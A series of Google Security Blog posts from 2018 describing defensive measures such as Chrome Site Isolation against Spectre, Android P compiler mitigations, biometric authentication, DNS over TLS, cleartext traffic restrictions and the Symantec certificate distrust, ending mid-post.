Posted by Charlie Reis, Site IsolatorSpeculative execution side-channel attacks like Spectre are a newly discovered security risk for web browsers. A website could use such attacks to steal data or login information from other websites that are open in the browser. To better mitigate these attacks, we're excited to announce that Chrome 67 has enabled a security feature called Site Isolation on Windows, Mac, Linux, and Chrome OS. Site Isolation has been optionally available as an experimental enterprise policy since Chrome 63, but many known issues have been resolved since then, making it practical to enable by default for all desktop Chrome users.This launch is one phase of our overall Site Isolation project. Stay tuned for additional security updates that will mitigate attacks beyond Spectre (e.g., attacks from fully compromised renderer processes).What is Spectre?In January, Google Project Zero disclosed a set of speculative execution side-channel attacks that became publicly known as Spectre and Meltdown. An additional variant of Spectre was disclosed in May. These attacks use the speculative execution features of most CPUs to access parts of memory that should be off-limits to a piece of code, and then use timing attacks to discover the values stored in that memory. Effectively, this means that untrustworthy code may be able to read any memory in its process's address space.This is particularly relevant for web browsers, since browsers run potentially malicious JavaScript code from multiple websites, often in the same process. In theory, a website could use such an attack to steal information from other websites, violating the Same Origin Policy. All major browsers have already deployed some mitigations for Spectre, including reducing timer granularity and changing their JavaScript compilers to make the attacks less likely to succeed. However, we believe the most effective mitigation is offered by approaches like Site Isolation, which try to avoid having data worth stealing in the same process, even if a Spectre attack occurs.What is Site Isolation?Site Isolation is a large change to Chrome's architecture that limits each renderer process to documents from a single site. As a result, Chrome can rely on the operating system to prevent attacks between processes, and thus, between sites. Note that Chrome uses a specific definition of "site" that includes just the scheme and registered domain. Thus, https://google.co.uk would be a site, and subdomains like https://maps.google.co.uk would stay in the same process.Chrome has always had a multi-process architecture where different tabs could use different renderer processes. A given tab could even switch processes when navigating to a new site in some cases. However, it was still possible for an attacker's page to share a process with a victim's page. For example, cross-site iframes and cross-site pop-ups typically stayed in the same process as the page that created them. This would allow a successful Spectre attack to read data (e.g., cookies, passwords, etc.) belonging to other frames or pop-ups in its process.When Site Isolation is enabled, each renderer process contains documents from at most one site. This means all navigations to cross-site documents cause a tab to switch processes. It also means all cross-site iframes are put into a different process than their parent frame, using "out-of-process iframes." Splitting a single page across multiple processes is a major change to how Chrome works, and the Chrome Security team has been pursuing this for several years, independently of Spectre. The first uses of out-of-process iframes shipped last year to improve the Chrome extension security model.A single page may now be split across multiple renderer processes using out-of-process iframes.Even when each renderer process is limited to documents from a single site, there is still a risk that an attacker's page could access and leak information from cross-site URLs by requesting them as subresources, such as images or scripts. Web browsers generally allow pages to embed images and scripts from any site. However, a page could try to request an HTML or JSON URL with sensitive data as if it were an image or script. This would normally fail to render and not expose the data to the page, but that data would still end up inside the renderer process where a Spectre attack might access it. To mitigate this, Site Isolation includes a feature called Cross-Origin Read Blocking (CORB), which is now part of the Fetch spec. CORB tries to transparently block cross-site HTML, XML, and JSON responses from the renderer process, with almost no impact to compatibility. To get the most protection from Site Isolation and CORB, web developers should check that their resources are served with the right MIME type and with the nosniff response header.Site Isolation is a significant change to Chrome's behavior under the hood, but it generally shouldn't cause visible changes for most users or web developers (beyond a few known issues). It simply offers more protection between websites behind the scenes. Site Isolation does cause Chrome to create more renderer processes, which comes with performance tradeoffs: on the plus side, each renderer process is smaller, shorter-lived, and has less contention internally, but there is about a 10-13% total memory overhead in real workloads due to the larger number of processes. Our team continues to work hard to optimize this behavior to keep Chrome both fast and secure.How does Site Isolation help?In Chrome 67, Site Isolation has been enabled for 99% of users on Windows, Mac, Linux, and Chrome OS. (Given the large scope of this change, we are keeping a 1% holdback for now to monitor and improve performance.) This means that even if a Spectre attack were to occur in a malicious web page, data from other websites would generally not be loaded into the same process, and so there would be much less data available to the attacker. This significantly reduces the threat posed by Spectre.Because of this, we are planning to re-enable precise timers and features like SharedArrayBuffer (which can be used as a precise timer) for desktop.What additional work is in progress?We're now investigating how to extend Site Isolation coverage to Chrome for Android, where there are additional known issues. Experimental enterprise policies for enabling Site Isolation will be available in Chrome 68 for Android, and it can be enabled manually on Android using chrome://flags/#enable-site-per-process.We're also working on additional security checks in the browser process, which will let Site Isolation mitigate not just Spectre attacks but also attacks from fully compromised renderer processes. These additional enforcements will let us reach the original motivating goals for Site Isolation, where Chrome can effectively treat the entire renderer process as untrusted. Stay tuned for an update about these enforcements! Finally, other major browser vendors are finding related ways to defend against Spectre by better isolating sites. We are collaborating with them and are happy to see the progress across the web ecosystem.Help improve Site Isolation!We offer cash rewards to researchers who submit security bugs through the Chrome Vulnerability Reward Program. For a limited time, security bugs affecting Site Isolation may be eligible for higher rewards levels, up to twice the usual amount for information disclosure bugs. Find out more about Chrome New Feature Special Rewards.

Posted by Ivan Lozano, Information Security Engineer [Cross-posted from the Android Developers Blog]Android's switch to LLVM/Clang as the default platform compiler in Android 7.0 opened up more possibilities for improving our defense-in-depth security posture. In the past couple of releases, we've rolled out additional compiler-based mitigations to make bugs harder to exploit and prevent certain types of bugs from becoming vulnerabilities. In Android P, we're expanding our existing compiler mitigations, which instrument runtime operations to fail safely when undefined behavior occurs. This post describes the new build system support for Control Flow Integrity and Integer Overflow Sanitization. Control Flow IntegrityA key step in modern exploit chains is for an attacker to gain control of a program's control flow by corrupting function pointers or return addresses. This opens the door to code-reuse attacks where an attacker executes arbitrary portions of existing program code to achieve their goals, such as counterfeit-object-oriented and return-oriented programming. Control Flow Integrity (CFI) describes a set of mitigation technologies that confine a program's control flow to a call graph of valid targets determined at compile-time. While we first supported LLVM's CFI implementation in select components in Android O, we're greatly expanding that support in P. This implementation focuses on preventing control flow manipulation via indirect branches, such as function pointers and virtual functions—the 'forward-edges' of a call graph. Valid branch targets are defined as function entry points for functions with the expected function signature, which drastically reduces the set of allowable destinations an attacker can call. Indirect branches are instrumented to detect runtime violations of the statically determined set of allowable targets. If a violation is detected because a branch points to an unexpected target, then the process safely aborts. Figure 1. Assembly-level comparison of a virtual function call with and without CFI enabled. For example, Figure 1 illustrates how a function that takes an object and calls a virtual function gets translated into assembly with and without CFI. For simplicity, this was compiled with -O0 to prevent compiler optimization. Without CFI enabled, it loads the object's vtable pointer and calls the function at the expected offset. With CFI enabled, it performs a fast-path first check to determine if the pointer falls within an expected range of addresses of compatible vtables. Failing that, execution falls through to a slow path that does a more extensive check for valid classes that are defined in other shared libraries. The slow path will abort execution if the vtable pointer points to an invalid target. With control flow tightly restricted to a small set of legitimate targets, code-reuse attacks become harder to utilize and some memory corruption vulnerabilities become more difficult or even impossible to exploit. In terms of performance impact, LLVM's CFI requires compiling with Link-Time Optimization (LTO). LTO preserves the LLVM bitcode representation of object files until link-time, which allows the compiler to better reason about what optimizations can be performed. Enabling LTO reduces the size of the final binary and improves performance, but increases compile time. In testing on Android, the combination of LTO and CFI results in negligible overhead to code size and performance; in a few cases both improved. For more technical details about CFI and how other forward-control checks are handled, see the LLVM design documentation. For Android P, CFI is enabled by default widely within the media frameworks and other security-critical components, such as NFC and Bluetooth. CFI kernel support has also been introduced into the Android common kernel when building with LLVM, providing the option to further harden the trusted computing base. This can be tested today on the HiKey reference boards. Integer Overflow SanitizationThe UndefinedBehaviorSanitizer's (UBSan) signed and unsigned integer overflow sanitization was first utilized when hardening the media stack in Android Nougat. This sanitization is designed to safely abort process execution if a signed or unsigned integer overflows by instrumenting arithmetic instructions which may overflow. The end result is the mitigation of an entire class of memory corruption and information disclosure vulnerabilities where the root cause is an integer overflow, such as the original Stagefright vulnerability. Because of their success, we've expanded usage of these sanitizers in the media framework with each release. Improvements have been made to LLVM's integer overflow sanitizers to reduce the performance impact by using fewer instructions in ARM 32-bit and removing unnecessary checks. In testing, these improvements reduced the sanitizers' performance overhead by over 75% in Android's 32-bit libstagefright library for some codecs. Improved Android build system support, such as better diagnostics support, more sensible crashes, and globally sanitized integer overflow targets for testing have also expedited the rollout of these sanitizers. We've prioritized enabling integer overflow sanitization in libraries where complex untrusted input is processed or where there have been security bulletin-level integer overflow vulnerabilities reported. As a result, in Android P the following libraries now benefit from this mitigation: libui libnl libmediaplayerservice libexif libdrmclearkeyplugin libreverbwrapper Future PlansMoving forward, we're expanding our use of these mitigation technologies and we strongly encourage vendors to do the same with their customizations. More information about how to enable and test these options will be available soon on the Android Open Source Project. Acknowledgements: This post was developed in joint collaboration with Vishwath Mohan, Jeffrey Vander Stoep, Joel Galenson, and Sami Tolvanen

Posted by Vishwath Mohan, Security Engineer[Cross-posted from the Android Developers Blog]To keep users safe, most apps and devices have an authentication mechanism, or a way to prove that you're you. These mechanisms fall into three categories: knowledge factors, possession factors, and biometric factors. Knowledge factors ask for something you know (like a PIN or a password), possession factors ask for something you have (like a token generator or security key), and biometric factors ask for something you are (like your fingerprint, iris, or face). Biometric authentication mechanisms are becoming increasingly popular, and it's easy to see why. They're faster than typing a password, easier than carrying around a separate security key, and they prevent one of the most common pitfalls of knowledge-factor based authentication—the risk of shoulder surfing. As more devices incorporate biometric authentication to safeguard people's private information, we're improving biometrics-based authentication in Android P by: Defining a better model to measure biometric security, and using that to functionally constrain weaker authentication methods. Providing a common platform-provided entry point for developers to integrate biometric authentication into their apps.A better security model for biometricsCurrently, biometric unlocks quantify their performance today with two metrics borrowed from machine learning (ML): False Accept Rate (FAR), and False Reject Rate (FRR). In the case of biometrics, FAR measures how often a biometric model accidentally classifies an incorrect input as belonging to the target user—that is, how often another user is falsely recognized as the legitimate device owner. Similarly, FRR measures how often a biometric model accidentally classifies the user's biometric as incorrect—that is, how often a legitimate device owner has to retry their authentication. The first is a security concern, while the second is problematic for usability. Both metrics do a great job of measuring the accuracy and precision of a given ML (or biometric) model when applied to random input samples. However, because neither metric accounts for an active attacker as part of the threat model, they do not provide very useful information about its resilience against attacks. In Android 8.1, we introduced two new metrics that more explicitly account for an attacker in the threat model: Spoof Accept Rate (SAR) and Imposter Accept Rate (IAR). As their names suggest, these metrics measure how easily an attacker can bypass a biometric authentication scheme. Spoofing refers to the use of a known-good recording (e.g. replaying a voice recording or using a face or fingerprint picture), while impostor acceptance means a successful mimicking of another user's biometric (e.g. trying to sound or look like a target user). Strong vs. Weak BiometricsWe use the SAR/IAR metrics to categorize biometric authentication mechanisms as either strong or weak. Biometric authentication mechanisms with an SAR/IAR of 7% or lower are strong, and anything above 7% is weak. Why 7% specifically? Most fingerprint implementations have a SAR/IAR metric of about 7%, making this an appropriate standard to start with for other modalities as well. As biometric sensors and classification methods improve, this threshold can potentially be decreased in the future. This binary classification is a slight oversimplification of the range of security that different implementations provide. However, it gives us a scalable mechanism (via the tiered authentication model) to appropriately scope the capabilities and the constraints of different biometric implementations across the ecosystem, based on the overall risk they pose. While both strong and weak biometrics will be allowed to unlock a device, weak biometrics: require the user to re-enter their primary PIN, pattern, password or a strong biometric to unlock a device after a 4-hour window of inactivity, such as when left at a desk or charger. This is in addition to the 72-hour timeout that is enforced for both strong and weak biometrics. are not supported by the forthcoming BiometricPrompt API, a common API for app developers to securely authenticate users on a device in a modality-agnostic way. can't authenticate payments or participate in other transactions that involve a KeyStore auth-bound key. must show users a warning that articulates the risks of using the biometric before it can be enabled.These measures are intended to allow weaker biometrics, while reducing the risk of unauthorized access. BiometricPrompt APIStarting in Android P, developers can use the BiometricPrompt API to integrate biometric authentication into their apps in a device and biometric agnostic way. BiometricPrompt only exposes strong modalities, so developers can be assured of a consistent level of security across all devices their application runs on. A support library is also provided for devices running Android O and earlier, allowing applications to utilize the advantages of this API across more devices . Here's a high-level architecture of BiometricPrompt. The API is intended to be easy to use, allowing the platform to select an appropriate biometric to authenticate with instead of forcing app developers to implement this logic themselves. Here's an example of how a developer might use it in their app: ConclusionBiometrics have the potential to both simplify and strengthen how we authenticate our digital identity, but only if they are designed securely, measured accurately, and implemented in a privacy-preserving manner. We want Android to get it right across all three. So we're combining secure design principles, a more attacker-aware measurement methodology, and a common, easy to use biometrics API that allows developers to integrate authentication in a simple, consistent, and safe manner. Acknowledgements: This post was developed in joint collaboration with Jim Miller

Posted by Giles Hogben, Privacy Engineer and Milinda Perera, Software Engineer [Cross-posted from the Android Developers Blog]Developers already use HTTPS to communicate with Firebase Cloud Messaging (FCM). The channel between FCM server endpoint and the device is encrypted with SSL over TCP. However, messages are not encrypted end-to-end (E2E) between the developer server and the user device unless developers take special measures. To this end, we advise developers to use keys generated on the user device to encrypt push messages end-to-end. But implementing such E2E encryption has historically required significant technical knowledge and effort. That is why we are excited to announce the Capillary open source library which greatly simplifies the implementation of E2E-encryption for push messages between developer servers and users' Android devices. We also added functionality for sending messages that can only be decrypted on devices that have recently been unlocked. This is designed to support for decrypting messages on devices using File-Based Encryption (FBE): encrypted messages are cached in Device Encrypted (DE) storage and message decryption keys are stored in Android Keystore, requiring user authentication. This allows developers to specify messages with sensitive content, that remain encrypted in cached form until the user has unlocked and decrypted their device. The library handles: Crypto functionality and key management across all versions of Android back to KitKat (API level 19). Key generation and registration workflows. Message encryption (on the server) and decryption (on the client). Integrity protection to prevent message modification. Caching of messages received in unauthenticated contexts to be decrypted and displayed upon device unlock. Edge-cases, such as users adding/resetting device lock after installing the app, users resetting app storage, etc.The library supports both RSA encryption with ECDSA authentication and Web Push encryption, allowing developers to re-use existing server-side code developed for sending E2E-encrypted Web Push messages to browser-based clients. Along with the library, we are also publishing a demo app (at last, the Google privacy team has its own messaging app!) that uses the library to send E2E-encrypted FCM payloads from a gRPC-based server implementation. What it's notThe open source library and demo app are not designed to support peer-to-peer messaging and key exchange. They are designed for developers to send E2E-encrypted push messages from a server to one or more devices. You can protect messages between the developer's server and the destination device, but not directly between devices. It is not a comprehensive server-side solution. While core crypto functionality is provided, developers will need to adapt parts of the sample server-side code that are specific to their architecture (for example, message composition, database storage for public keys, etc.)You can find more technical details describing how we've architected and implemented the library and demo here.

Posted by Shawn Willden, Staff Software Engineer [Cross-posted from the Android Developers Blog]Our smart devices, such as mobile phones and tablets, contain a wealth of personal information that needs to be kept safe. Google is constantly trying to find new and better ways to protect that valuable information on Android devices. From partnering with external researchers to find and fix vulnerabilities, to adding new features to the Android platform, we work to make each release and new device safer than the last. This post talks about Google's strategy for making the encryption on Google Pixel 2 devices resistant to various levels of attack—from platform, to hardware, all the way to the people who create the signing keys for Pixel devices. We encrypt all user data on Google Pixel devices and protect the encryption keys in secure hardware. The secure hardware runs highly secure firmware that is responsible for checking the user's password. If the password is entered incorrectly, the firmware refuses to decrypt the device. This firmware also limits the rate at which passwords can be checked, making it harder for attackers to use a brute force attack. To prevent attackers from replacing our firmware with a malicious version, we apply digital signatures. There are two ways for an attacker to defeat the signature checks and install a malicious replacement for firmware: find and exploit vulnerabilities in the signature-checking process or gain access to the signing key and get their malicious version signed so the device will accept it as a legitimate update. The signature-checking software is tiny, isolated, and vetted with extreme thoroughness. Defeating it is hard. The signing keys, however, must exist somewhere, and there must be people who have access to them. In the past, device makers have focused on safeguarding these keys by storing the keys in secure locations and severely restricting the number of people who have access to them. That's good, but it leaves those people open to attack by coercion or social engineering. That's risky for the employees personally, and we believe it creates too much risk for user data. To mitigate these risks, Google Pixel 2 devices implement insider attack resistance in the tamper-resistant hardware security module that guards the encryption keys for user data. This helps prevent an attacker who manages to produce properly signed malicious firmware from installing it on the security module in a lost or stolen device without the user's cooperation. Specifically, it is not possible to upgrade the firmware that checks the user's password unless you present the correct user password. There is a way to "force" an upgrade, for example when a returned device is refurbished for resale, but forcing it wipes the secrets used to decrypt the user's data, effectively destroying it. The Android security team believes that insider attack resistance is an important element of a complete strategy for protecting user data. The Google Pixel 2 demonstrated that it's possible to protect users even against the most highly-privileged insiders. We recommend that all mobile device makers do the same. For help, device makers working to implement insider attack resistance can reach out to the Android security team through their Google contact. Acknowledgements: This post was developed in joint collaboration with Paul Crowley, Senior Software Engineer

Posted by Sai Deep Tetali, Software Engineer, Google Play Protect[Cross-posted from the Android Developers Blog]At Google I/O 2017, we introduced Google Play Protect, our comprehensive set of security services for Android. While the name is new, the smarts powering Play Protect have protected Android users for years. Google Play Protect's suite of mobile threat protections are built into more than 2 billion Android devices, automatically taking action in the background. We're constantly updating these protections so you don't have to think about security: it just happens. Our protections have been made even smarter by adding machine learning elements to Google Play Protect. Security at scaleGoogle Play Protect provides in-the-moment protection from potentially harmful apps (PHAs), but Google's protections start earlier. Before they're published in Google Play, all apps are rigorously analyzed by our security systems and Android security experts. Thanks to this process, Android devices that only download apps from Google Play are 9 times less likely to get a PHA than devices that download apps from other sources. After you install an app, Google Play Protect continues its quest to keep your device safe by regularly scanning your device to make sure all apps are behaving properly. If it finds an app that is misbehaving, Google Play Protect either notifies you, or simply removes the harmful app to keep your device safe. Our systems scan over 50 billion apps every day. To keep on the cutting edge of security, we look for new risks in a variety of ways, such as identifying specific code paths that signify bad behavior, investigating behavior patterns to correlate bad apps, and reviewing possible PHAs with our security experts. In 2016, we added machine learning as a new detection mechanism and it soon became a critical part of our systems and tools. Training our machines In the most basic terms, machine learning means training a computer algorithm to recognize a behavior. To train the algorithm, we give it hundreds of thousands of examples of that behavior. In the case of Google Play Protect, we are developing algorithms that learn which apps are "potentially harmful" and which are "safe." To learn about PHAs, the machine learning algorithms analyze our entire catalog of applications. Then our algorithms look at hundreds of signals combined with anonymized data to compare app behavior across the Android ecosystem to find PHAs. They look for behavior common to PHAs, such as apps that attempt to interact with other apps on the device, access or share your personal data, download something without your knowledge, connect to phishing websites, or bypass built-in security features. When we find apps exhibit similar malicious behavior, we group them into families. Visualizing these PHA families helps us uncover apps that share similarities to known bad apps, but have yet remained under our radar. After we identify a new PHA, we confirm our findings with expert security reviews. If the app in question is a PHA, Google Play Protect takes action on the app and then we feed information about that PHA back into our algorithms to help find more PHAs. Doubling down on securitySo far, our machine learning systems have successfully detected 60.3% of the malware identified by Google Play Protect in 2017. In 2018, we're devoting a massive amount of computing power and talent to create, maintain and improve these machine learning algorithms. We're constantly leveraging artificial intelligence and our highly skilled researchers and engineers from all across Google to find new ways to keep Android devices safe and secure. In addition to our talented team, we work with the foremost security experts and researchers from around the world. These researchers contribute even more data and insights to keep Google Play Protect on the cutting edge of mobile security. To check out Google Play Protect, open the Google Play app and tap Play Protect in the left panel. Acknowledgements: This work was developed in joint collaboration with Google Play Protect, Safe Browsing and Play Abuse teams with contributions from Andrew Ahn, Hrishikesh Aradhye, Daniel Bali, Hongji Bao, Yajie Hu, Arthur Kaiser, Elena Kovakina, Salvador Mandujano, Melinda Miller, Rahul Mishra, Damien Octeau, Sebastian Porst, Chuangang Ren, Monirul Sharif, Sri Somanchi, Sai Deep Tetali, Zhikun Wang, and Mo Yu.

Posted by Jan Keller, Security TPMGoogle CTF 2017 was a big success! We had over 5,000 players, nearly 2,000 teams captured flags, we paid $31,1337.00, and most importantly: you had fun playing and we had fun hosting!Congratulations (for the second year) to the team pasten, from Israel, for scoring first place in both the quals and the finals. Also, for everyone who hasn’t played yet or wants to play again, we have open-sourced the 2017 challenges in our GitHub repository.Hence, we are excited to announce Google CTF 2018:Date and time: 00:00:01 UTC on June 23th and 24th, 2018Location: OnlinePrizes: Big checks, swag and rewards for creative write-upsThe winning teams will compete again for a spot at the Google CTF Finals later this year (more details on the Finals soon).For beginners and veterans alikeBased on the feedback we received, we plan to have additional challenges this year where people that may be new to CTFs or security can learn about, and try their hands at, some security challenges. These will be presented in a “Quest” style where there will be a scenario similar to a real world penetration testing environment. We hope that this will give people a chance to sharpen their skills, learn something new about CTFs and security, while allowing them to see a real world value to information security and its broader impact.We hope to virtually see you at the 3rd annual Google CTF on June 23rd 2018 at 00:00:01 UTC. Check g.co/ctf, or subscribe to our mailing list for more details, as they become available.Why do we host these competitions?We outlined our philosophy last year, but in short: we believe that the security community helps us better protect Google users, and so we want to nurture the community and give back in a fun way.Thirsty for more?There are a lot of opportunities for you to help us make the Internet a safer place:Our Vulnerability Rewards Program: Report vulnerabilities in our infrastructure and get rewarded(AutoFuzz) Patch Rewards Program: Fix vulnerabilities in open-source software to build your reputation and make an impact in the security communityVulnerability Research Grants Program: Apply for a research grant to extensively test a component of our infrastructure at your own pace.

Posted by Elie Bursztein, Anti-Abuse Research Lead - Ian Goodfellow, Adversarial Machine Learning Research LeadRecent advances in AI are transforming how we combat fraud and abuse and implement new security protections. These advances are critical to meeting our users’ expectations and keeping increasingly sophisticated attackers at bay, but they come with brand new challenges as well.This week at RSA, we explored the intersection between AI, anti-abuse, and security in two talks.Our first talk provided a concise overview of how we apply AI to fraud and abuse problems. The talk started by detailing the fundamental reasons why AI is key to building defenses that keep up with user expectations and combat increasingly sophisticated attacks. It then delved into the top 10 anti-abuse specific challenges encountered while applying AI to abuse fighting and how to overcome them. Check out the infographic at the end of the post for a quick overview of the challenges we covered during the talk.Our second talk looked at attacks on ML models themselves and the ongoing effort to develop new defenses.It covered attackers’ attempts to recover private training data, to introduce examples into the training set of a machine learning model to cause it to learn incorrect behaviors, to modify the input that a machine learning model receives at classification time to cause it to make a mistake, and more.Our talk also looked at various defense solutions, including differential privacy, which provides a rigorous theoretical framework for preventing attackers from recovering private training data.Hopefully you were to able to join us at RSA! But if not, here is re-recording and the slides of our first talk on applying AI to abuse-prevention, along with the slides from our second talk about protecting ML models.

Posted by Erik Kline, Android software engineer, and Ben Schwartz, Jigsaw software engineer[Cross-posted from the Android Developers Blog]The first step of almost every connection on the internet is a DNS query. A client, such as a smartphone, typically uses a DNS server provided by the Wi-Fi or cellular network. The client asks this DNS server to convert a domain name, like www.google.com, into an IP address, like 2607:f8b0:4006:80e::2004. Once the client has the IP address, it can connect to its intended destination.When the DNS protocol was designed in the 1980s, the internet was a much smaller, simpler place. For the past few years, the Internet Engineering Task Force (IETF) has worked to define a new DNS protocol that provides users with the latest protections for security and privacy. The protocol is called "DNS over TLS" (standardized as RFC 7858).Like HTTPS, DNS over TLS uses the TLS protocol to establish a secure channel to the server. Once the secure channel is established, DNS queries and responses can't be read or modified by anyone else who might be monitoring the connection. (The secure channel only applies to DNS, so it can't protect users from other kinds of security and privacy violations.)DNS over TLS in PThe Android P Developer Preview includes built-in support for DNS over TLS. We added a Private DNS mode to the Network & internet settings.By default, devices automatically upgrade to DNS over TLS if a network's DNS server supports it. But users who don't want to use DNS over TLS can turn it off.Users can enter a hostname if they want to use a private DNS provider. Android then sends all DNS queries over a secure channel to this server or marks the network as "No internet access" if it can't reach the server. (For testing purposes, see this community-maintained list of compatible servers.)DNS over TLS mode automatically secures the DNS queries from all apps on the system. However, apps that perform their own DNS queries, instead of using the system's APIs, must ensure that they do not send insecure DNS queries when the system has a secure connection. Apps can get this information using a new API: LinkProperties.isPrivateDnsActive()With the Android P Developer Preview, we're proud to present built-in support for DNS over TLS. In the future, we hope that all operating systems will include secure transports for DNS, to provide better protection and privacy for all users on every new connection.

Posted by Chad Brubaker, Senior Software Engineer Android Security[Cross-posted from the Android Developers Blog]Android is committed to keeping users, their devices, and their data safe. One of the ways that we keep data safe is by protecting all data that enters or leaves an Android device with Transport Layer Security (TLS) in transit. As we announced in our Android P developer preview, we're further improving these protections by preventing apps that target Android P from allowing unencrypted connections by default.This follows a variety of changes we've made over the years to better protect Android users. To prevent accidental unencrypted connections, we introduced the android:usesCleartextTraffic manifest attribute in Android Marshmallow. In Android Nougat, we extended that attribute by creating the Network Security Config feature, which allows apps to indicate that they do not intend to send network traffic without encryption. In Android Nougat and Oreo, we still allowed cleartext connections.How do I update my app?If your app uses TLS for all connections then you have nothing to do. If not, update your app to use TLS to encrypt all connections. If you still need to make cleartext connections, keep reading for some best practices.Why should I use TLS?Android considers all networks potentially hostile and so encrypting traffic should be used at all times, for all connections. Mobile devices are especially at risk because they regularly connect to many different networks, such as the Wi-Fi at a coffee shop.All traffic should be encrypted, regardless of content, as any unencrypted connections can be used to inject content, increase attack surface for potentially vulnerable client code, or track the user. For more information, see our past blog post and Developer Summit talk.Isn't TLS slow?No, it's not.How do I use TLS in my app?Once your server supports TLS, simply change the URLs in your app and server responses from http:// to https://. Your HTTP stack handles the TLS handshake without any more work.If you are making sockets yourself, use an SSLSocketFactory instead of a SocketFactory. Take extra care to use the socket correctly as SSLSocket doesn't perform hostname verification. Your app needs to do its own hostname verification, preferably by calling getDefaultHostnameVerifier() with the expected hostname. Further, beware that HostnameVerifier.verify() doesn't throw an exception on error but instead returns a boolean result that you must explicitly check.I need to use cleartext traffic toWhile you should use TLS for all connections, it's possibly that you need to use cleartext traffic for legacy reasons, such as connecting to some servers. To do this, change your app's network security config to allow those connections.We've included a couple example configurations. See the network security config documentation for a bit more help.Allow cleartext connections to a specific domainIf you need to allow connections to a specific domain or set of domains, you can use the following config as a guide:<network-security-config> <domain-config cleartextTrafficPermitted="true"> <domain includeSubdomains="true">insecure.example.com</domain> <domain includeSubdomains="true">insecure.cdn.example.com</domain> </domain-config></network-security-config>Allow connections to arbitrary insecure domainsIf your app supports opening arbitrary content from URLs over insecure connections, you should disable cleartext connections to your own services while supporting cleartext connections to arbitrary hosts. Keep in mind that you should be cautious about the data received over insecure connections as it could have been tampered with in transit.<network-security-config> <domain-config cleartextTrafficPermitted="false"> <domain includeSubdomains="true">example.com</domain> <domain includeSubdomains="true">cdn.example2.com</domain> </domain-config> <base-config cleartextTrafficPermitted="true" /></network-security-config>How do I update my library?If your library directly creates secure/insecure connections, make sure that it honors the app's cleartext settings by checking isCleartextTrafficPermitted before opening any cleartext connection.

Posted by Dave Kleidermacher, Vice President of Security for Android, Play, ChromeOSOur team’s goal is simple: secure more than two billion Android devices. It’s our entire focus, and we’re constantly working to improve our protections to keep users safe.Today, we’re releasing our fourth annual Android Security Year in Review. We compile these reports to help educate the public about the many different layers of Android security, and also to hold ourselves accountable so that anyone can track our security work over time.We saw really positive momentum last year and this post includes some, but not nearly all, of the major moments from 2017. To dive into all the details, you can read the full report at: g.co/AndroidSecurityReport2017Google Play ProtectIn May, we announced Google Play Protect, a new home for the suite of Android security services on nearly two billion devices. While many of Play Protect’s features had been securing Android devices for years, we wanted to make these more visible to help assure people that our security protections are constantly working to keep them safe.Play Protect’s core objective is to shield users from Potentially Harmful Apps, or PHAs. Every day, it automatically reviews more than 50 billion apps, other potential sources of PHAs, and devices themselves and takes action when it finds any.Play Protect uses a variety of different tactics to keep users and their data safe, but the impact of machine learning is already quite significant: 60.3% of all Potentially Harmful Apps were detected via machine learning, and we expect this to increase in the future.Protecting users' devicesPlay Protect automatically checks Android devices for PHAs at least once every day, and users can conduct an additional review at any time for some extra peace of mind. These automatic reviews enabled us to remove nearly 39 million PHAs last year.We also update Play Protect to respond to trends that we detect across the ecosystem. For instance, we recognized that nearly 35% of new PHA installations were occurring when a device was offline or had lost network connectivity. As a result, in October 2017, we enabled offline scanning in Play Protect, and have since prevented 10 million more PHA installs.Preventing PHA downloadsDevices that downloaded apps exclusively from Google Play were nine times less likely to get a PHA than devices that downloaded apps from other sources. And these security protections continue to improve, partially because of Play Protect’s increased visibility into newly submitted apps to Play. It reviewed 65% more Play apps compared to 2016.Play Protect also doesn’t just secure Google Play—it helps protect the broader Android ecosystem as well. Thanks in large part to Play Protect, the installation rates of PHAs from outside of Google Play dropped by more than 60%.Security updatesWhile Google Play Protect is a great shield against harmful PHAs, we also partner with device manufacturers to make sure that the version of Android running on users' devices is up-to-date and secure.Throughout the year, we worked to improve the process for releasing security updates, and 30% more devices received security patches than in 2016. Furthermore, no critical security vulnerabilities affecting the Android platform were publicly disclosed without an update or mitigation available for Android devices. This was possible due to the Android Security Rewards Program, enhanced collaboration with the security researcher community, coordination with industry partners, and built-in security features of the Android platform.New security features in Android OreoWe introduced a slew of new security features in Android Oreo: making it safer to get apps, dropping insecure network protocols, providing more user control over identifiers, hardening the kernel, and more.We highlighted many of these over the course of the year, but some may have flown under the radar. For example, we updated the overlay API so that apps can no longer block the entire screen and prevent you from dismissing them, a common tactic employed by ransomware.Openness makes Android security strongerWe’ve long said it, but it remains truer than ever: Android’s openness helps strengthen our security protections. For years, the Android ecosystem has benefitted from researchers’ findings, and 2017 was no different.Security reward programsWe continued to see great momentum with our Android Security Rewards program: we paid researchers $1.28 million dollars, pushing our total rewards past $2 million dollars since the program began. We also increased our top-line payouts for exploits that compromise TrustZone or Verified Boot from $50,000 to $200,000, and remote kernel exploits from $30,000 to $150,000.In parallel, we introduced Google Play Security Rewards Program and offered a bonus bounty to developers that discover and disclose select critical vulnerabilities in apps hosted on Play to their developers.External security competitionsOur teams also participated in external vulnerability discovery and disclosure competitions, such as Mobile Pwn2Own. At the 2017 Mobile Pwn2Own competition, no exploits successfully compromised the Google Pixel. And of the exploits demonstrated against devices running Android, none could be reproduced on a device running unmodified Android source code from the Android Open Source Project (AOSP).We’re pleased to see the positive momentum behind Android security, and we’ll continue our work to improve our protections this year, and beyond. We will never stop our work to ensure the security of Android users.

Posted by Devon O’Brien, Ryan Sleevi, Emily Stark, Chrome security teamWe previously announced plans to deprecate Chrome’s trust in the Symantec certificate authority (including Symantec-owned brands like Thawte, VeriSign, Equifax, GeoTrust, and RapidSSL). This post outlines how site operators can determine if they’re affected by this deprecation, and if so, what needs to be done and by when. Failure to replace these certificates will result in site breakage in upcoming versions of major browsers, including Chrome.Chrome 66If your site is using a SSL/TLS certificate from Symantec that was issued before June 1, 2016, it will stop functioning in Chrome 66, which could already be impacting your users.If you are uncertain about whether your site is using such a certificate, you can preview these changes in Chrome Canary to see if your site is affected. If connecting to your site displays a certificate error or a warning in DevTools as shown below, you’ll need to replace your certificate. You can get a new certificate from any trusted CA, including Digicert, which recently acquired Symantec’s CA business.An example of a certificate error that Chrome 66 users might see if you are using a Legacy Symantec SSL/TLS certificate that was issued before June 1, 2016. The DevTools message you will see if you need to replace your certificate before Chrome 66.Chrome 66 has already been released to the Canary and Dev channels, meaning affected sites are already impacting users of these Chrome channels. If affected sites do not replace their certificates by March 15, 2018, Chrome Beta users will begin experiencing the failures as well. You are strongly encouraged to replace your certificate as soon as possible if your site is currently showing an error in Chrome Canary.Chrome 70Starting in Chrome 70, all remaining Symantec SSL/TLS certificates will stop working, resulting in a certificate error like the one shown 